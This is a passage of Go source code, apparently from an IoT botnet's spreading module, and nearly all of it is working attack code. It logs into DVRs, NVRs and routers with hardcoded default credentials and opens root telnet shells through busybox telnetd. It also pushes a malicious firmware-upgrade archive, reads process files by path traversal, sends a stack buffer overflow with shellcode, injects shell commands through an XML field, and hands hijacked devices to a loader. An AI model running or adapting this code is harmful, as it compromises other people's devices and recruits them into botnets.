            payload += magicPayload + "f"
732
            payload += payloadThree
733
            
734
            conn.Write([]byte(payload))
735
            state++
736
            zeroByte(rdbuf)
737
            continue
738
        }
739
    }
740

741
    conn.Close()
742
    magicGroup.Done()
743
    return
744
}
745

746
func infectFunctionLibdvrProto(host string, attempt int) (int, error, string, int) {
747

748
	var gotAdmin int = 0
749
	var gotShell int = 0
750
	var password string
751
	var rInt int = 0
752

753
	rInt = rand.Intn(9999 - 9000) + 9000
754

755
    conn, err := net.DialTimeout("tcp", host, time.Duration(10) * time.Second)
756
    if err != nil {
757
        return 0, nil, "", 0
758
    }
759

760
    defer conn.Close()
761
    conn.SetWriteDeadline(time.Now().Add(6 * time.Second))
762
    _, err = conn.Write([]byte("/bin/busybox BOXOFABOX\n"))
763
    if err != nil {
764
    	conn.Close()
765
        return 0, nil, "", 0
766
    }
767

768
    conn.SetReadDeadline(time.Now().Add(6 * time.Second))
769

770
    first_buf := make([]byte, 256)
771
    l, err := conn.Read(first_buf)
772
    if err != nil || l <= 0 {
773
        conn.Close()
774
        return 0, nil, "", 0
775
    }
776

777
    if strings.Contains(string(first_buf), "user name") || strings.Contains(string(first_buf), "username") {
778
		_, err = conn.Write([]byte("admin\n"))
779
		if err != nil {
780
			conn.Close()
781
		    return 0, nil, "", 0
782
		}
783
    } else {
784
    	if strings.Contains(string(first_buf), "BOXOFABOX: applet not found") {
785
    		gotShell = 1
786
    	} else {
787
		    _, err = conn.Write([]byte("\n"))
788
		    if err != nil {
789
		    	conn.Close()
790
		        return 0, nil, "", 0
791
		    }
792

793
		    conn.SetReadDeadline(time.Now().Add(3 * time.Second))
794
		    first_buf := make([]byte, 256)
795
		    l, err := conn.Read(first_buf)
796
		    if err != nil || l <= 0 {
797
		        conn.Close()
798
		        return 0, nil, "", 0
799
		    }
800

801
		    if !strings.Contains(string(first_buf), "user name") && !strings.Contains(string(first_buf), "username") {
802
		    	if strings.Contains(string(first_buf), "admin$") {
803
		    		gotAdmin = 1
804
		    	} else {
805
		    		conn.Close()
806
		    		return 0, nil, "", 0
807
		    	}
808
		    } else {
809
			    _, err = conn.Write([]byte("admin\n"))
810
			    if err != nil {
811
			    	conn.Close()
812
			        return 0, nil, "", 0
813
			    }
814
		    }
815
    	}
816
    }
817

818
   	if gotAdmin != 1 && gotShell != 1 {
819
	    conn.SetReadDeadline(time.Now().Add(3 * time.Second))
820
	    second_buf := make([]byte, 256)
821
	    l2, err := conn.Read(second_buf)
822
	    if err != nil || l2 <= 0 {
823
	        conn.Close()
824
	        return 0, nil, "", 0
825
	    }
826

827
	    if strings.Contains(string(second_buf), "pass word") || strings.Contains(string(second_buf), "password") {
828
	    	if attempt == 0 {
829
	    		password = "I0TO5Wv9"
830
	    	} else if attempt == 1 {
831
	    		password = "123456"
832
	    	} else if attempt == 2 {
833
	    		password = "admin"
834
	    	}
835

836
		    _, err = conn.Write([]byte(password + "\n"))
837
		    if err != nil {
838
		    	conn.Close()
839
		        return 0, nil, "", 0
840
		    }
841

842
		    conn.SetReadDeadline(time.Now().Add(3 * time.Second))
843
		    second_buf := make([]byte, 1024)
844
		    l, err := conn.Read(second_buf)
845
		    if err != nil || l <= 0 {
846
		        conn.Close()
847
		        return 0, nil, "", 0
848
		    }
849

850
		    if strings.Contains(string(second_buf), "admin$") {
851
		    	gotAdmin = 1
852
		    } else {
853
		    	conn.Close()
854
		    	return 0, nil, "", 0
855
		    }
856
	    } else if strings.Contains(string(second_buf), "admin$") {
857
	    	gotAdmin = 1
858
	    } else {
859
	    	conn.Close()
860
	    	return 0, nil, "", 0
861
	    }
862
   	}
863

864
   	if gotAdmin == 1  || gotShell == 1 {
865
   		conn.Write([]byte("shell\n"))
866
	   	conn.Write([]byte("/bin/busybox BOXOFABOX\n"))
867

868
	   	new_buf := make([]byte, 128)
869
	    l, err := conn.Read(new_buf)
870
	    if err != nil || l <= 0 {
871
	        conn.Close()
872
	        return 0, nil, "", 0
873
	    }
874

875
	    if strings.Contains(string(new_buf), "BOXOFABOX: applet not found") {
876
		   	conn.Write([]byte("/bin/busybox telnetd -p" + strconv.Itoa(rInt) + " -l/bin/sh\n"))
877
		    conn.Write([]byte("exit\n"))
878
		    conn.Write([]byte("quit\n"))
879
	   		conn.Close()
880

881
	   		time.Sleep(3 * time.Second)
882
	   		return 1, nil, password, rInt
883
	    } else {
884
		    conn.Write([]byte("exit\n"))
885
		    conn.Write([]byte("quit\n"))
886
	        conn.Close()
887
	        return 0, nil, "", 0
888
	    }
889
   	} else {
890
   		conn.Write([]byte("quit\n"))
891
   		conn.Close()
892
   		return 0, nil, "", 0
893
   	}
894
}
895

896
func infectFunctionLibdvr(target string) {
897

898
	splitStr := strings.Split(target, ":")
899
   	for i := 0; i < 3; i++ {
900
	    exploited, err, _, port := infectFunctionLibdvrProto(target, i)
901
	    if err != nil {
902
	        return
903
	    }
904

905
	    if exploited == 1 {
906
	    	fmt.Printf("\x1b[38;5;46mLibdvr\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m potential telnet shell\x1b[38;5;15m\r\n", target)
907
	    	telnetLoader(splitStr[0] + ":" + strconv.Itoa(port), 0, "arm7", loaderLibdvrTag)
908
	        return
909
	    }
910
	}
911
}
912

913
func infectFunctionDvrip(target string) {
914

915
	var (
916
		bytebuf []byte = []byte("")
917
		adminPasswords []string = []string{"tlJwpbo6", "S2fGqNFs", "OxhlwSG8", "ORsEWe7l", "nTBCS19C"}
918
		username string = "admin"
919
		password string = ""
920
		attempt int = 0
921
		authed int = 0
922
	)
923

924
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
925
    if err != nil {
926
		return
927
    }
928

929
    for
930
	{
931
		if attempt >= 5 {
932
			break
933
		} else {
934
			password = adminPasswords[attempt]
935
		}
936

937
		conn.Write([]byte("\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe8\x03\x64\x00\x00\x00{ \"EncryptType\" : \"MD5\", \"LoginType\" : \"DVRIP-Web\", \"PassWord\" : \"" + password + "\", \"UserName\" : \"" + username + "\" }\x0a"))
938

939
		for {
940
	        tmpbuf := make([]byte, 128)
941
	        ln, err := conn.Read(tmpbuf)
942
	        if ln <= 0 || err != nil {
943
	            break
944
	        }
945

946
	        bytebuf = append(bytebuf, tmpbuf...)
947
	        if strings.Contains(string(bytebuf), "}") {
948
	        	break
949
	        }
950
	    }
951

952
		dvrret, err := strconv.Atoi(getStringInBetween(string(bytebuf), "\"Ret\" : ", ", \"SessionID"))
953
		if err != nil {
954
			authed = 0
955
			break
956
	    }
957

958
		if dvrret == DVRIP_OK {
959
			authed = 1
960
		}
961

962
		dvrret = DVRIP_NORESP
963

964
		if authed == 1 {
965
			break
966
		}
967
			
968
		attempt++
969
		continue
970
	}
971

972
	if authed != 1 {
973
		conn.Close()
974
		return
975
	}
976

977
	conn.Write([]byte("\xff\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\xee\x03\x35\x00\x00\x00{ \"Name\" : \"KeepAlive\", \"SessionID\" : \"0x00000004\" }\x0a"))
978
	zeroByte(bytebuf)
979

980
	for {
981
	    tmpbuf := make([]byte, 128)
982
	    ln, err := conn.Read(tmpbuf)
983
	    if ln <= 0 || err != nil {
984
	        conn.Close()
985
	        return
986
	    }
987

988
	    bytebuf = append(bytebuf, tmpbuf...)
989
	    if strings.Contains(string(bytebuf), "}") {
990
	        break
991
	    }
992
	}
993

994
	zeroByte(bytebuf)
995
	conn.Write([]byte("\xff\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x05\x73\x00\x00\x00{ \"Name\" : \"OPSystemUpgrade\", \"OPSystemUpgrade\" : { \"Action\" : \"Start\", \"Type\" : \"System\" }, \"SessionID\" : \"0x00000004\" }\x0a"))
996

997
	for {
998
	    tmpbuf := make([]byte, 128)
999
	    ln, err := conn.Read(tmpbuf)
1000
	    if ln <= 0 || err != nil {
1001
	        conn.Close()
1002
	        return
1003
	    }
1004

1005
	    bytebuf = append(bytebuf, tmpbuf...)
1006
	    if strings.Contains(string(bytebuf), "}") {
1007
	        break
1008
	    }
1009
	}
1010

1011
	zeroByte(bytebuf)
1012
	conn.Write([]byte("\xff\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf2\x05\x62\x01\x00\x00\x50\x4B\x03\x04\x14\x03\x00\x00\x08\x00\x2C\x87\x1A\x4F\x9A\xF8\xB3\x9E\xC6\x00\x00\x00\x23\x02\x00\x00\x0B\x00\x00\x00\x49\x6E\x73\x74\x61\x6C\x6C\x44\x65\x73\x63\xB5\x90\x3D\x0B\xC2\x30\x10\x86\x77\x7F\xC5\x91\xD9\x62\x15\x1C\x74\xAD\x88\xAE\x56\x5D\xC4\x21\x35\x87\x0D\xC6\xE4\x48\xE2\x47\x91\xFE\x77\xDB\x14\x11\xAB\x8B\x88\x37\x64\x79\xDE\x7B\x2E\x77\xB7\x0E\x00\x5B\xD1\xDE\x72\x81\x89\x39\x1E\xB9\x16\x6C\x0C\x9B\x0E\x54\x55\xB1\x50\xEC\x09\x58\x9A\xA3\x52\xAC\xFB\x20\xE9\xCE\x4A\xF2\x35\xF0\xA8\x34\x7A\x01\x11\xC1\x28\x8E\xFB\x10\x29\xE8\x65\x52\xF7\x5C\xCE\x42\xB8\xEC\x7E\xEF\xCC\x4E\xAE\xC8\xCC\x15\xFE\xE1\x76\x0A\x91\x60\x30\x1C\x0D\xE2\xF8\xF7\x1F\x7E\xB0\x55\xEF\xB6\xEE\x60\x33\x6E\xC5\x85\x5B\x0C\xA2\x83\xA4\x24\xC7\xDD\x81\x05\x94\x9E\x88\x8C\xF5\x53\xC5\x5D\xBE\x2C\x08\xDF\x4F\x1F\xD0\x7C\xF2\xD2\xDB\x1E\x30\xC1\x73\x48\xB4\xED\x6B\xD4\xC2\xD8\x36\x68\x36\x23\xEE\x65\xA6\x70\x8D\xD6\x49\xA3\xAB\x4C\xD4\x6F\xD0\x22\x69\xCD\x2A\xEF\x50\x4B\x01\x02\x3F\x03\x14\x03\x00\x00\x08\x00\x2C\x87\x1A\x4F\x9A\xF8\xB3\x9E\xC6\x00\x00\x00\x23\x02\x00\x00\x0B\x00\x24\x00\x00\x00\x00\x00\x00\x00\x20\x80\xA4\x81\x00\x00\x00\x00\x49\x6E\x73\x74\x61\x6C\x6C\x44\x65\x73\x63\x0A\x00\x20\x00\x00\x00\x00\x00\x01\x00\x18\x00\x00\xCA\x6F\xF3\x26\x5C\xD5\x01\x00\x40\x5B\x5C\x2F\x5C\xD5\x01\x80\xD6\xF3\x5C\x2F\x5C\xD5\x01\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00\x5D\x00\x00\x00\xEF\x00\x00\x00\x00\x00"))
1013
	
1014
	for {
1015
	    tmpbuf := make([]byte, 128)
1016
	    ln, err := conn.Read(tmpbuf)
1017
	    if ln <= 0 || err != nil {
1018
	        conn.Close()
1019
	        return
1020
	    }
1021

1022
	    bytebuf = append(bytebuf, tmpbuf...)
1023
	    if strings.Contains(string(bytebuf), "}") {
1024
	        break
1025
	    }
1026
	}
1027

1028
	zeroByte(bytebuf)
1029
	conn.Write([]byte("\xff\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00\x01\xf2\x05\x00\x00\x00\x00"))
1030

1031
	splitStr := strings.Split(target, ":")
1032
	time.Sleep(10 * time.Second)
1033

1034
    fmt.Printf("\x1b[38;5;46mDvrip\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m potential telnet shell opened\x1b[38;5;15m\r\n", target)
1035
    go telnetLoader(splitStr[0] + ":9001", 0, "arm7", loaderDvripTag)
1036

1037
	conn.Write([]byte("\xFF\x01\x00\x00\x57\x00\x00\x00\x00\x00\x00\x00\x00\x00\xEA\x03\x27\x00\x00\x00{ \"Name\" : \"\", \"SessionID\" : \"0x00000004\" }\x0a"))
1038
	conn.Close()
1039
	return
1040
}
1041

1042
/* ------ END OF THE OTHER STUFF ------ */
1043

1044
func ucSofiaCheck(target string, pid string) (found int) {
1045

1046
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
1047
    if err != nil {
1048
        return -1
1049
    }
1050

1051
    defer conn.Close()
1052
    tmp := make([]byte, 256)
1053
    buf := make([]byte, 0, 512)
1054

1055
    fmt.Fprintf(conn, "GET ../../proc/%s/cmdline HTTP\r\n\r\n", pid)
1056
    for {
1057
        n, err := conn.Read(tmp)
1058
        if err != nil {
1059
            break
1060
        }
1061

1062
        buf = append(buf, tmp[:n]...)
1063
    }
1064

1065
    if (strings.Contains(string(buf), "/var/Sofia") || strings.Contains(string(buf), "usr/bin/Sofia") || strings.Contains(string(buf), "system_sofia") || strings.Contains(string(buf), "/var/bin/system_sofia")) && !strings.Contains(string(buf), "dvrHelper") {
1066
        return 1
1067
    } else {
1068
        return -1
1069
    }
1070
}
1071

1072
func ucGuessSmaps(target string, pid string) (found int) {
1073

1074
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
1075
    if err != nil {
1076
        return -1
1077
    }
1078

1079
    defer conn.Close()
1080
    tmp := make([]byte, 8096)
1081
    buf := make([]byte, 0, 512)
1082

1083
    fmt.Fprintf(conn, "GET ../../proc/%s/smaps HTTP\r\n\r\n", pid)
1084
    for {
1085
        n, err := conn.Read(tmp)
1086
        if err != nil {
1087
            break
1088
        }
1089

1090
        buf = append(buf, tmp[:n]...)
1091
    }
1092

1093
    smapsLines := strings.Split(string(buf), "\n")
1094
    smapsCount := 0
1095
    gotRegion := 0
1096
    regionsAdded := 0
1097

1098
    for i := 0; i < len(smapsLines); i++ {
1099
        if !strings.Contains(string(smapsLines[i]), "rwxp") {
1100
            continue
1101
        }
1102

1103
        smapsCount++
1104
    }
1105

1106
    smapsRegions := make([]*smapsRegion, smapsCount)
1107
    for i := range smapsRegions {
1108
        smapsRegions[i] = &smapsRegion{}
1109
    }
1110

1111
    for i := 0; i < len(smapsLines); i++ {
1112
        if gotRegion == 8 || gotRegion == 0 {
1113
            if !strings.Contains(string(smapsLines[i]), "rwxp") {
1114
                continue
1115
            }
1116

1117
            region := strings.Split(string(smapsLines[i]), "-")
1118
            smapsRegions[regionsAdded].region = hexToInt(region[0])
1119

1120
            for q := 0; q < len(region); q++ {
1121
                region[q] = ""
1122
            }
1123

1124
            gotRegion = 1
1125
        } else {
1126
            if gotRegion == 1 {
1127
                startAt := 0
1128
                endAt := 0
1129

1130
                for q := 0; q < len(smapsLines[i]); q++ {
1131
                    if startAt == 0 {
1132
                        if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil {
1133
                            startAt = q
1134
                            continue
1135
                        }
1136
                    }
1137
                    if endAt == 0 && startAt > 0 {
1138
                        if smapsLines[i][q:q+1] == " " {
1139
                            endAt = q
1140
                            continue
1141
                        }
1142
                    }
1143
                }
1144

1145
                if startAt > 0 && endAt > 0 {
1146
                    smapsRegions[regionsAdded].size, _ = strconv.Atoi(smapsLines[i][startAt:endAt])
1147
                    gotRegion = 2
1148
                    continue
1149
                }
1150

1151
            } else if gotRegion == 2 {
1152
                startAt := 0
1153
                endAt := 0
1154

1155
                for q := 0; q < len(smapsLines[i]); q++ {
1156
                    if startAt == 0 {
1157
                        if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil {
1158
                            startAt = q
1159
                            continue
1160
                        }
1161
                    }
1162
                    if endAt == 0 && startAt > 0 {
1163
                        if smapsLines[i][q:q+1] == " " {
1164
                            endAt = q
1165
                            continue
1166
                        }
1167
                    }
1168
                }
1169

1170
                if startAt > 0 && endAt > 0 {
1171
                    smapsRegions[regionsAdded].rss, _ = strconv.Atoi(smapsLines[i][startAt:endAt])
1172
                    gotRegion = 3
1173
                    continue
1174
                }
1175
            } else if gotRegion == 3 {
1176
                startAt := 0
1177
                endAt := 0
1178

1179
                for q := 0; q < len(smapsLines[i]); q++ {
1180
                    if startAt == 0 {
1181
                        if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil {
1182
                            startAt = q
1183
                            continue
1184
                        }
1185
                    }
1186
                    if endAt == 0 && startAt > 0 {
1187
                        if smapsLines[i][q:q+1] == " " {
1188
                            endAt = q
1189
                            continue
1190
                        }
1191
                    }
1192
                }
1193

1194
                if startAt > 0 && endAt > 0 {
1195
                    smapsRegions[regionsAdded].pss, _ = strconv.Atoi(smapsLines[i][startAt:endAt])
1196
                    gotRegion = 4
1197
                    continue
1198
                }
1199
            } else if gotRegion == 4 {
1200
                startAt := 0
1201
                endAt := 0
1202

1203
                for q := 0; q < len(smapsLines[i]); q++ {
1204
                    if startAt == 0 {
1205
                        if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil {
1206
                            startAt = q
1207
                            continue
1208
                        }
1209
                    }
1210
                    if endAt == 0 && startAt > 0 {
1211
                        if smapsLines[i][q:q+1] == " " {
1212
                            endAt = q
1213
                            continue
1214
                        }
1215
                    }
1216
                }
1217

1218
                if startAt > 0 && endAt > 0 {
1219
                    smapsRegions[regionsAdded].shared_clean, _ = strconv.Atoi(smapsLines[i][startAt:endAt])
1220
                    gotRegion = 5
1221
                    continue
1222
                }
1223
            } else if gotRegion == 5 {
1224
                startAt := 0
1225
                endAt := 0
1226

1227
                for q := 0; q < len(smapsLines[i]); q++ {
1228
                    if startAt == 0 {
1229
                        if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil {
1230
                            startAt = q
1231
                            continue
1232
                        }
1233
                    }
1234
                    if endAt == 0 && startAt > 0 {
1235
                        if smapsLines[i][q:q+1] == " " {
1236
                            endAt = q
1237
                            continue
1238
                        }
1239
                    }
1240
                }
1241

1242
                if startAt > 0 && endAt > 0 {
1243
                    smapsRegions[regionsAdded].shared_ditry, _ = strconv.Atoi(smapsLines[i][startAt:endAt])
1244
                    gotRegion = 6
1245
                    continue
1246
                }
1247
            } else if gotRegion == 6 {
1248
                startAt := 0
1249
                endAt := 0
1250

1251
                for q := 0; q < len(smapsLines[i]); q++ {
1252
                    if startAt == 0 {
1253
                        if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil {
1254
                            startAt = q
1255
                            continue
1256
                        }
1257
                    }
1258
                    if endAt == 0 && startAt > 0 {
1259
                        if smapsLines[i][q:q+1] == " " {
1260
                            endAt = q
1261
                            continue
1262
                        }
1263
                    }
1264
                }
1265

1266
                if startAt > 0 && endAt > 0 {
1267
                    smapsRegions[regionsAdded].private_clean, _ = strconv.Atoi(smapsLines[i][startAt:endAt])
1268
                    gotRegion = 7
1269
                    continue
1270
                }
1271
            } else if gotRegion == 7 {
1272
                startAt := 0
1273
                endAt := 0
1274

1275
                for q := 0; q < len(smapsLines[i]); q++ {
1276
                    if startAt == 0 {
1277
                        if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil {
1278
                            startAt = q
1279
                            continue
1280
                        }
1281
                    }
1282
                    if endAt == 0 && startAt > 0 {
1283
                        if smapsLines[i][q:q+1] == " " {
1284
                            endAt = q
1285
                            continue
1286
                        }
1287
                    }
1288
                }
1289

1290
                if startAt > 0 && endAt > 0 {
1291
                    smapsRegions[regionsAdded].private_dirty, _ = strconv.Atoi(smapsLines[i][startAt:endAt])
1292
                    gotRegion = 8
1293
                    regionsAdded++
1294
                    continue
1295
                }
1296
            }
1297

1298
            gotRegion++
1299
        }
1300
    }
1301

1302
    for i := len(smapsRegions) - 7; i > 1; i-- {
1303
        if smapsRegions[i].size == 8188 && smapsRegions[i + 1].size == 8188 && smapsRegions[i + 2].size == 8188 && smapsRegions[i + 3].size == 8188 && smapsRegions[i + 4].size == 8188 && smapsRegions[i + 5].size == 8188 && smapsRegions[i + 6].size == 8188 {
1304
            if smapsRegions[i].rss == 4 && smapsRegions[i + 1].rss == 4 && smapsRegions[i + 2].rss == 4 && smapsRegions[i + 3].rss >= 8 && smapsRegions[i + 4].rss >= 4 && smapsRegions[i + 5].rss >= 4 && smapsRegions[i + 6].rss >= 8 {
1305
                return int(smapsRegions[i + 3].region)
1306
            }
1307
        }
1308
    }
1309

1310
    return 0
1311
}
1312

1313
func ucSendBof(target string, offset int) {
1314

1315
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
1316
    if err != nil {
1317
        return
1318
    }
1319

1320
    defer conn.Close()
1321

1322
    v := uint32(offset)
1323
    offsetBuf := make([]byte, 4)
1324
    binary.LittleEndian.PutUint32(offsetBuf, v)
1325

1326
    conn.Write([]byte("GET "))
1327
    conn.Write([]byte(uchttpdShellCode))
1328

1329
    for i := 0; i < 299 - len(uchttpdShellCode); i ++ {
1330
        conn.Write([]byte("a"))
1331
    }
1332

1333
    conn.Write([]byte(offsetBuf))
1334
    conn.Write([]byte(" HTTP\r\n\r\n"))
1335

1336
    buf := make([]byte, 0, 512)
1337
    tmp := make([]byte, 256)
1338

1339
    for {
1340
        n, err := conn.Read(tmp)
1341
        if err != nil {
1342
            break
1343
        }
1344

1345
        buf = append(buf, tmp[:n]...)
1346
    }
1347

1348
    zeroByte(buf)
1349
    zeroByte(tmp)
1350
}
1351

1352
func infectFunctionUchttpd(target string) {
1353

1354
    var pidStrs[128] string
1355
    var pidsFound int = 0
1356

1357
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
1358
    if err != nil {
1359
        return
1360
    }
1361

1362
    /* Dvrip check */
1363
    go func() {
1364
        ipslit := strings.Split(target, ":")
1365
        tmpconn, err := net.DialTimeout("tcp", ipslit[0] + ":34567", 10 * time.Second)
1366
        if err == nil {
1367
        	tmpconn.Close()
1368
        	infectFunctionDvrip(ipslit[0] + ":34567")
1369
        }
1370
    } ()
1371
    /* ////////////// */
1372

1373
    /* Libdvr check */
1374
    go func() {
1375
        ipslit := strings.Split(target, ":")
1376
        tmpconn, err := net.DialTimeout("tcp", ipslit[0] + ":9527", 10 * time.Second)
1377
        if err == nil {
1378
        	tmpconn.Close()
1379
        	infectFunctionLibdvr(ipslit[0] + ":9527")
1380
        }
1381
    } ()
1382
    /* ////////////// */
1383

1384
    tmp := make([]byte, 256)
1385
    buf := make([]byte, 0, 512)
1386

1387
    fmt.Fprintf(conn, "GET ../../proc/ HTTP\r\n\r\n")
1388
    for {
1389
        n, err := conn.Read(tmp)
1390
        if err != nil {
1391
            break
1392
        }
1393

1394
        buf = append(buf, tmp[:n]...)
1395
    }
1396

1397
    if !strings.Contains(string(buf), "Index of /mnt/web/") {
1398
        zeroByte(tmp)
1399
        zeroByte(buf)
1400
        conn.Close()
1401
        time.Sleep(10 * time.Second)
1402
        return
1403
    }
1404

1405
    zeroByte(tmp)
1406
    zeroByte(buf)
1407

1408
    conn.Close()
1409
    conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
1410
    if err != nil {
1411
    	time.Sleep(10 * time.Second)
1412
        return
1413
    }
1414

1415
    buf = make([]byte, 0, 8096)
1416
    tmp = make([]byte, 256)
1417

1418
    fmt.Fprintf(conn, "GET ../../proc/ HTTP\r\n\r\n")
1419
    for {
1420
        n, err := conn.Read(tmp)
1421
        if err != nil {
1422
            break
1423
        }
1424

1425
        buf = append(buf, tmp[:n]...)
1426
    }
1427

1428
    pids := strings.Split(string(buf), "\n")
1429
    for i := 0; i < len(pids); i++ {
1430
        if i >= 128 {
1431
            break
1432
        }
1433

1434
        if len(pids[i]) < 38 {
1435
            continue
1436
        }
1437

1438
        if _, err := strconv.Atoi(pids[i][33:34]); err != nil {
1439
            continue
1440
        }
1441

1442
        pidstr := pids[i][33:38]
1443
        if _, err := strconv.Atoi(pidstr[0:1]); err == nil {
1444
            if _, err := strconv.Atoi(pidstr[1:2]); err == nil {
1445
                if _, err := strconv.Atoi(pidstr[2:3]); err == nil {
1446
                    if _, err := strconv.Atoi(pidstr[3:4]); err == nil {
1447
                        if _, err := strconv.Atoi(pidstr[4:5]); err == nil {
1448
                            if len(pidstr[0:]) >= 5 {
1449
                                pidStrs[pidsFound] = pidstr[0:5]
1450
                                pidsFound++
1451
                                continue
1452
                            }
1453
                        } else {
1454
                            if len(pidstr[0:]) >= 4 {
1455
                                pidStrs[pidsFound] = pidstr[0:4]
1456
                                pidsFound++
1457
                                continue
1458
                            }
1459
                        }
1460
                    } else {
1461
                        if len(pidstr[0:]) >= 3 {
1462
                            pidStrs[pidsFound] = pidstr[0:3]
1463
                            pidsFound++
1464
                            continue
1465
                        }
1466
                    }
1467
                } else {
1468
                    if len(pidstr[0:]) >= 2 {
1469
                        pidStrs[pidsFound] = pidstr[0:2]
1470
                        pidsFound++
1471
                        continue
1472
                    }
1473
                }
1474
            } else {
1475
                if len(pidstr[0:]) >= 1 {
1476
                    pidStrs[pidsFound] = pidstr[0:1]
1477
                    pidsFound++
1478
                    continue
1479
                }
1480
            }
1481
        }
1482

1483
        pidstr = ""
1484
    }
1485

1486
    zeroByte(buf)
1487
    zeroByte(tmp)
1488

1489
    if pidsFound <= 5 {
1490
        conn.Close()
1491
        time.Sleep(10 * time.Second)
1492
        return
1493
    }
1494

1495
    conn.Close()
1496

1497
    for i := pidsFound; i > 1; i-- {
1498
        retval := ucSofiaCheck(target, pidStrs[i])
1499
        if retval == -1 {
1500
            continue
1501
        }
1502

1503
        retval = ucGuessSmaps(target, pidStrs[i])
1504
        if retval == -1 {
1505
            continue
1506
        }
1507

1508
        stackOffset := retval + 0x7fd3d8 + 20
1509
        ucSendBof(target, stackOffset)
1510
        break
1511
    }
1512

1513
    for i := 0; i < pidsFound; i++ {
1514
        pidStrs[i] = ""
1515
    }
1516

1517
    zeroByte(buf)
1518
    zeroByte(tmp)
1519
    time.Sleep(10 * time.Second)
1520
    return
1521
}
1522

1523
func infectFunctionTvt(target string) {
1524

1525
    var rdbuf []byte = []byte("")
1526

1527
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
1528
    if err != nil {
1529
        return
1530
    }
1531

1532
    /* TVT4567 check */
1533
    go func() {
1534
        ipslit := strings.Split(target, ":")
1535
        tmpconn, err := net.DialTimeout("tcp", ipslit[0] + ":4567", 10 * time.Second)
1536
        if err == nil {
1537
            infectFunctionTvt4567(tmpconn)
1538
        }
1539

1540
        return
1541
    } ()
1542
    /* ////////////// */
1543

1544
    payload := "<?xml version=\"1.0\" encoding=\"utf-8\"?><request version=\"1.0\" systemType=\"NVMS-9000\" clientType=\"WEB\"><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\"filterTypeMode\">refuse</filterType><filterList type=\"list\"><itemType><addressType type=\"addressType\"/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$("
1545
    payload += tvtWebPayload
1546
    payload += ")</ip></item></filterList></content></request>"
1547

1548
    cntlen := strconv.Itoa(len(payload))
1549

1550
    conn.Write([]byte("POST /editBlackAndWhiteList HTTP/1.1\r\nAccept-Encoding: identity\r\nContent-Length: " + cntlen + "\r\nAccept-Language: en-us\r\nHost: " + target + "\r\nAccept: */*\r\nUser-Agent: Mozila/5.0\r\nConnection: close\r\nCache-Control: max-age=0\r\nContent-Type: text/xml\r\nAuthorization: Basic YWRtaW46ezEyMjEzQkQxLTY5QzctNDg2Mi04NDNELTI2MDUwMEQxREE0MH0=\r\n\r\n" + payload + "\r\n\r\n"))
1551

1552
    for {
1553
        tmpbuf := make([]byte, 128)
1554
        ln, err := conn.Read(tmpbuf)
1555
        if ln <= 0 || err != nil {
1556
            break
1557
        }
1558

1559
        rdbuf = append(rdbuf, tmpbuf...)
1560
        if strings.Contains(string(rdbuf), "<status>success</status>") {
1561
            fmt.Printf("\x1b[38;5;46mTvt\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", target)
1562
            payloadSent++
1563
            break
1564
        }
1565
    }
1566

1567
    conn.Close()
1568
    time.Sleep(10 * time.Second)
1569
}
1570

1571
func infectFunctionFiberhome(target string) {
1572

1573
    var (
1574
        rdbuf []byte = []byte("")
1575
        authed int = 0
1576
        telnetPort int = 0
1577
    )
1578

1579
    conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
1580
    if err != nil {
1581
        return
1582
    }
1583

1584
    conn.Write([]byte("POST /goform/webLogin HTTP/1.1\r\nHost: " + target + "\r\nUser-Agent: Mozila/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 23\r\nOrigin: http://" + target + "\r\nConnection: keep-alive\r\nReferer: http://" + target + "/login_inter.asp\r\nUpgrade-Insecure-Requests: 1\r\n\r\nUser=admin&Passwd=admin\r\n\r\n"))
1585
    
1586
    for {
1587
        tmpbuf := make([]byte, 128)
1588
        ln, err := conn.Read(tmpbuf)
1589
        if ln <= 0 || err != nil {
1590
            break
1591
        }
1592

1593
        rdbuf = append(rdbuf, tmpbuf...)
1594
        if strings.Contains(string(rdbuf), "Set-Cookie: loginName=admin") {
1595
            authed = 1
1596
            break
1597
        }
1598
    }
1599

1600
    conn.Close()
1601

1602
    if authed == 0 {
1603
        return
1604
    }
1605

1606
    conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
1607
    if err != nil {
1608
        return
1609
    }
1610

1611
